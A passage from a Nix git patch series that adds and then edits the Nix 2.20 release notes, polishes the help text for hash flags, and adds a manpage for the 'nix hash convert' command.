-120,6 +120,7 @@ - [C++ style guide](contributing/cxx.md) - [Release Notes](release-notes/index.md) {{#include ./SUMMARY-rl-next.md}} + - [Release 2.20 (2024-01-29)](release-notes/rl-2.20.md) - [Release 2.19 (2023-11-17)](release-notes/rl-2.19.md) - [Release 2.18 (2023-09-20)](release-notes/rl-2.18.md) - [Release 2.17 (2023-07-24)](release-notes/rl-2.17.md) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md new file mode 100644 index 000000000..8c9267486 --- /dev/null +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -0,0 +1,334 @@ +# Release 2.20.0 (2024-01-29) + +- Option `allowed-uris` can now match whole schemes in URIs without slashes [#9547](https://github.com/NixOS/nix/pull/9547) + + If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. + Previously this only worked for schemes whose URIs used the `://` syntax. + +- Make `nix store gc` use the auto-GC policy [#7851](https://github.com/NixOS/nix/pull/7851) + + + +- Include cgroup stats when building through the daemon [#9598](https://github.com/NixOS/nix/pull/9598) + + Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, + if both sides of the connection are this version of Nix or newer. + +- Fix handling of truncated `.drv` files. [#9673](https://github.com/NixOS/nix/pull/9673) + + Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. + +- Disallow empty search regex in `nix search` [#9481](https://github.com/NixOS/nix/pull/9481) + + [`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. + +- Reduce eval memory usage and wall time [#9658](https://github.com/NixOS/nix/pull/9658) + + Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. + This reduces memory usage during eval by around 2% and wall time by around 3%. + +- Add new `eval-system` setting [#4093](https://github.com/NixOS/nix/pull/4093) + + Add a new `eval-system` option. + Unlike `system`, it just overrides the value of `builtins.currentSystem`. + This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. + In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + + `eval-system` only takes effect if it is non-empty. + If empty (the default) `system` is used as before, so there is no breakage. + +- Nix now uses `libgit2` for Git fetching [#5313](https://github.com/NixOS/nix/issues/5313) [#9240](https://github.com/NixOS/nix/pull/9240) [#9241](https://github.com/NixOS/nix/pull/9241) [#9258](https://github.com/NixOS/nix/pull/9258) [#9480](https://github.com/NixOS/nix/pull/9480) + + Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. + The existing implementation based on the Git CLI had issues regarding reproducibility and performance. + + Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. + + Known issues: + - The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. + +- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) + + Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + + ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + + For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` + parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value + remains as a deprecated alias for `"base32"`. Please convert your code from: + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} + ``` + + to + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} + ``` + +- import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) + + When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. + + Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. + +- Mounted SSH Store [#7890](https://github.com/NixOS/nix/issues/7890) [#7912](https://github.com/NixOS/nix/pull/7912) + + Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). + This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. + +- Rename to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) + + `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. + +- Fix `nix-env --query --drv-path --json` [#9257](https://github.com/NixOS/nix/pull/9257) + + Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. + +- Some stack overflow segfaults are fixed [#8882](https://github.com/NixOS/nix/issues/8882) [#8893](https://github.com/NixOS/nix/pull/8893) + + `nix flake check` now logs the checks it runs and the derivations it evaluates: + + ``` + $ nix flake check -v + evaluating flake... + checking flake output 'checks'... + checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... + derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... + derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... + derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... + derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... + derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv + checking flake output 'packages'... + checking derivation 'packages.aarch64-darwin.default'... + derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv + checking flake output 'apps'... + checking flake output 'devShells'... + checking derivation 'devShells.aarch64-darwin.default'... + derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv + running 5 flake checks... + warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux + Use '--all-systems' to check all. + ``` + +- Add `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) + + New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track + to stabilization! Examples: + + - Convert the hash to `nix32`. + + ```bash + $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + `nix32` is a base32 encoding with a nix-specific character set. + Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input + hash. + - Convert the hash to the `sri` format that includes an algorithm specification: + ```bash + nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + or with an explicit `-to` format: + ```bash + nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + - Assert the input format of the hash: + ```bash + nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + + The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. + + ## Related Deprecations + + The following commands are still available but will emit a deprecation warning. Please convert your code to + `nix hash convert`: + + - `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. + - `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. + - `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. + - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` + or even just `nix hash convert $hash1 $hash2` instead. + +- `nix profile` now allows referring to elements by human-readable name [#8678](https://github.com/NixOS/nix/pull/8678) + + [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. + + **Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. + +- Rename hash format `base32` to `nix32` [#8678](https://github.com/NixOS/nix/pull/8678) + + Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + + ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + + For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` + parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value + remains as a deprecated alias for `"base32"`. Please convert your code from: + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} + ``` + + to + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} + ``` + +- Give `nix store add` a `--hash-algo` flag [#9809](https://github.com/NixOS/nix/pull/9809) + + Adds a missing feature that was present in the old CLI, and matches our + plans to have similar flags for `nix hash convert` and `nix hash path`. + +- Coercion errors include the failing value + + The `error: cannot coerce a to a string` message now includes the value + which caused the error. + + Before: + + ``` + error: cannot coerce a set to a string + ``` + + After: + + ``` + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} + ``` + +- Type errors include the failing value + + In errors like `value is an integer while a list was expected`, the message now + includes the failing value. + + Before: + + ``` + error: value is a set while a string was expected + ``` + + After: + + ``` + error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} + ``` + +- Source locations are printed more consistently in errors [#561](https://github.com/NixOS/nix/issues/561) [#9555](https://github.com/NixOS/nix/pull/9555) + + Source location information is now included in error messages more + consistently. Given this code: + + ```nix + let + attr = {foo = "bar";}; + key = {}; + in + attr.${key} + ``` + + Previously, Nix would show this unhelpful message when attempting to evaluate + it: + + ``` + error: + … while evaluating an attribute name + + error: value is a set while a string was expected + ``` + + Now, the error message displays where the problematic value was found: + + ``` + error: + … while evaluating an attribute name + + at bad.nix:4:11: + + 3| key = {}; + 4| in attr.${key} + | ^ + 5| + + error: expected a string but found a set + ``` + +- Some stack overflow segfaults are fixed [#9616](https://github.com/NixOS/nix/issues/9616) [#9617](https://github.com/NixOS/nix/pull/9617) + + The number of nested function calls has been restricted, to detect and report + infinite function call recursions. The default maximum call depth is 10,000 and + can be set with [the `max-call-depth` + option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). + + This fixes segfaults or the following unhelpful error message in many cases: + + error: stack overflow (possible infinite recursion) + + Before: + + ``` + $ nix-instantiate --eval --expr '(x: x x) (x: x x)' + Segmentation fault: 11 + ``` + + After: + + ``` + $ nix-instantiate --eval --expr '(x: x x) (x: x x)' + error: stack overflow + + at «string»:1:14: + 1| (x: x x) (x: x x) + | ^ + ``` + +- Better error reporting for `with` expressions [#9658](https://github.com/NixOS/nix/pull/9658) + + `with` expressions using non-attrset values to resolve variables are now reported with proper positions. + + Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: + + ``` + nix-repl> with 1; a + error: + … + + at «none»:0: (source not available) + + error: value is an integer while a set was expected + ``` + + Now position information is preserved and reported as with most other errors: + + ``` + nix-repl> with 1; a + error: + … while evaluating the first subexpression of a with expression + at «string»:1:1: + 1| with 1; a + | ^ + + error: expected a set but found an integer + ``` + From 6f86f87043971eb9414a6d63013a1e06af397f3a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:50:25 +0100 Subject: [PATCH 361/654] Fix formatting of hash args --- src/libutil/args.cc | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 5187e7396..8996cbe5b 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -557,7 +557,7 @@ Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashF assert(*hf == nix::HashFormat::SRI); return Flag{ .longName = std::move(longName), - .description = "hash format ('base16', 'nix32', 'base64', 'sri'). Default: 'sri'", + .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). Default: `sri`.", .labels = {"hash-format"}, .handler = {[hf](std::string s) { *hf = parseHashFormat(s); @@ -569,7 +569,7 @@ Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashF Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) { return Flag{ .longName = std::move(longName), - .description = "hash format ('base16', 'nix32', 'base64', 'sri').", + .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).", .labels = {"hash-format"}, .handler = {[ohf](std::string s) { *ohf = std::optional{parseHashFormat(s)}; @@ -589,7 +589,7 @@ Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * h { return Flag{ .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", + .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).", .labels = {"hash-algo"}, .handler = {[ha](std::string s) { *ha = parseHashAlgo(s); @@ -602,7 +602,7 @@ Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional< { return Flag{ .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", + .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). Can be omitted for SRI hashes.", .labels = {"hash-algo"}, .handler = {[oha](std::string s) { *oha = std::optional{parseHashAlgo(s)}; From 9465c8cca133a149c003e9ef4d7e97d513716155 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:51:01 +0100 Subject: [PATCH 362/654] nix hash convert: Add manpage --- src/nix/hash-convert.md | 40 ++++++++++++++++++++++++++++++++++++++++ src/nix/hash.cc | 15 +++++++-------- 2 files changed, 47 insertions(+), 8 deletions(-) create mode 100644 src/nix/hash-convert.md diff --git a/src/nix/hash-convert.md b/src/nix/hash-convert.md new file mode 100644 index 000000000..dfb215443 --- /dev/null +++ b/src/nix/hash-convert.md @@ -0,0 +1,40 @@ +R""( + +# Examples + +* Convert a hash to `nix32` (a base-32 encoding with a Nix-specific character set). + + ```console + $ nix hash convert --hash-algo sha1 --to nix32 800d59cfcd3c05e900cb4e214be48f6b886a08df + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + +* Convert a hash to [the `sri` format](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) that includes an algorithm specification: + + ```console + # nix hash convert --hash-algo sha1 800d59cfcd3c05e900cb4e214be48f6b886a08df + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + + or with an explicit `--to` format: + + ```console + # nix hash convert --hash-algo sha1 --to sri 800d59cfcd3c05e900cb4e214be48f6b886a08df + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + +* Assert the input format of the hash: + + ```console + # nix hash convert --hash-algo sha256 --from nix32 ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + + # nix hash convert --hash-algo sha256 --from nix32 1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + +# Description + +`nix hash convert` converts hashes from one encoding to another. + +)"" diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 8ab89e433..4837891c6 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -150,15 +150,14 @@ struct CmdHashConvert : Command std::string description() override { - std::string descr( "convert between different hash formats. Choose from: "); - auto iter = hashFormats.begin(); - assert(iter != hashFormats.end()); - descr += *iter++; - while (iter != hashFormats.end()) { - descr += ", " + *iter++; - } + return "convert between hash formats"; + } - return descr; + std::string doc() override + { + return + #include "hash-convert.md" + ; } Category category() override { return catUtility; } From 652f334f879153b1357f92504999d9b0fb951a2b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:51:21 +0100 Subject: [PATCH 363/654] Edit release notes --- doc/manual/src/release-notes/rl-2.20.md | 223 +++--------------------- 1 file changed, 29 insertions(+), 194 deletions(-) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 8c9267486..26869e90a 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -5,190 +5,60 @@ If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. Previously this only worked for schemes whose URIs used the `://` syntax. -- Make `nix store gc` use the auto-GC policy [#7851](https://github.com/NixOS/nix/pull/7851) - - - - Include cgroup stats when building through the daemon [#9598](https://github.com/NixOS/nix/pull/9598) - Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, - if both sides of the connection are this version of Nix or newer. - -- Fix handling of truncated `.drv` files. [#9673](https://github.com/NixOS/nix/pull/9673) - - Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. + Nix now also reports cgroup statistics when building through the Nix daemon and when doing remote builds using `ssh-ng`, + if both sides of the connection are using Nix 2.20 or newer. - Disallow empty search regex in `nix search` [#9481](https://github.com/NixOS/nix/pull/9481) [`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. -- Reduce eval memory usage and wall time [#9658](https://github.com/NixOS/nix/pull/9658) - - Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. - This reduces memory usage during eval by around 2% and wall time by around 3%. - - Add new `eval-system` setting [#4093](https://github.com/NixOS/nix/pull/4093) Add a new `eval-system` option. Unlike `system`, it just overrides the value of `builtins.currentSystem`. This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. - In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + In contrast, `system` also affects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. `eval-system` only takes effect if it is non-empty. If empty (the default) `system` is used as before, so there is no breakage. -- Nix now uses `libgit2` for Git fetching [#5313](https://github.com/NixOS/nix/issues/5313) [#9240](https://github.com/NixOS/nix/pull/9240) [#9241](https://github.com/NixOS/nix/pull/9241) [#9258](https://github.com/NixOS/nix/pull/9258) [#9480](https://github.com/NixOS/nix/pull/9480) - - Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. - The existing implementation based on the Git CLI had issues regarding reproducibility and performance. - - Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. - - Known issues: - - The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. - -- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) - - Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for - [Base32](https://en.wikipedia.org/wiki/Base32). - - ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - - For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` - parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value - remains as a deprecated alias for `"base32"`. Please convert your code from: - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} - ``` - - to - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} - ``` - -- import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) +- Import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. - Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. + Because the resulting Nix expression must be copied back to the evaluation store in order to be imported, this requires the evaluation store to trust the build store's signatures. - Mounted SSH Store [#7890](https://github.com/NixOS/nix/issues/7890) [#7912](https://github.com/NixOS/nix/pull/7912) Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. -- Rename to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) +- Rename `nix show-config` to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) - `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. + `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command line interface. -- Fix `nix-env --query --drv-path --json` [#9257](https://github.com/NixOS/nix/pull/9257) +- Add command `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) - Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. - -- Some stack overflow segfaults are fixed [#8882](https://github.com/NixOS/nix/issues/8882) [#8893](https://github.com/NixOS/nix/pull/8893) - - `nix flake check` now logs the checks it runs and the derivations it evaluates: - - ``` - $ nix flake check -v - evaluating flake... - checking flake output 'checks'... - checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... - derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... - derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... - derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... - derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... - derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv - checking flake output 'packages'... - checking derivation 'packages.aarch64-darwin.default'... - derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv - checking flake output 'apps'... - checking flake output 'devShells'... - checking derivation 'devShells.aarch64-darwin.default'... - derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv - running 5 flake checks... - warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux - Use '--all-systems' to check all. - ``` - -- Add `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) - - New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track - to stabilization! Examples: - - - Convert the hash to `nix32`. - - ```bash - $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" - vw46m23bizj4n8afrc0fj19wrp7mj3c0 - ``` - `nix32` is a base32 encoding with a nix-specific character set. - Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input - hash. - - Convert the hash to the `sri` format that includes an algorithm specification: - ```bash - nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - or with an explicit `-to` format: - ```bash - nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - - Assert the input format of the hash: - ```bash - nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" - error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" - sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= - ``` - - The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. - - ## Related Deprecations - - The following commands are still available but will emit a deprecation warning. Please convert your code to - `nix hash convert`: + This replaces the old `nix hash to-*` commands, which are still available but will emit a deprecation warning. Please convert as follows: - `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. - `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. - `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. - - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` - or even just `nix hash convert $hash1 $hash2` instead. + - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` or even just `nix hash convert $hash1 $hash2` instead. -- `nix profile` now allows referring to elements by human-readable name [#8678](https://github.com/NixOS/nix/pull/8678) +- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) + + Hash format `base32` was renamed to `nix32` since it used a special Nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + +- `nix profile` now allows referring to elements by human-readable names [#8678](https://github.com/NixOS/nix/pull/8678) [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. **Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. -- Rename hash format `base32` to `nix32` [#8678](https://github.com/NixOS/nix/pull/8678) - - Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for - [Base32](https://en.wikipedia.org/wiki/Base32). - - ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - - For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` - parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value - remains as a deprecated alias for `"base32"`. Please convert your code from: - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} - ``` - - to - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} - ``` - - Give `nix store add` a `--hash-algo` flag [#9809](https://github.com/NixOS/nix/pull/9809) Adds a missing feature that was present in the old CLI, and matches our @@ -202,17 +72,17 @@ Before: ``` - error: cannot coerce a set to a string + error: cannot coerce a set to a string ``` After: ``` - error: cannot coerce a set to a string: { aesSupport = «thunk»; - avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; - canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion - = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 - attributes elided»} + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} ``` - Type errors include the failing value @@ -223,16 +93,16 @@ Before: ``` - error: value is a set while a string was expected + error: value is a set while a string was expected ``` After: ``` - error: expected a string but found a set: { ghc810 = «thunk»; - ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; - ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; - ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} + error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} ``` - Source locations are printed 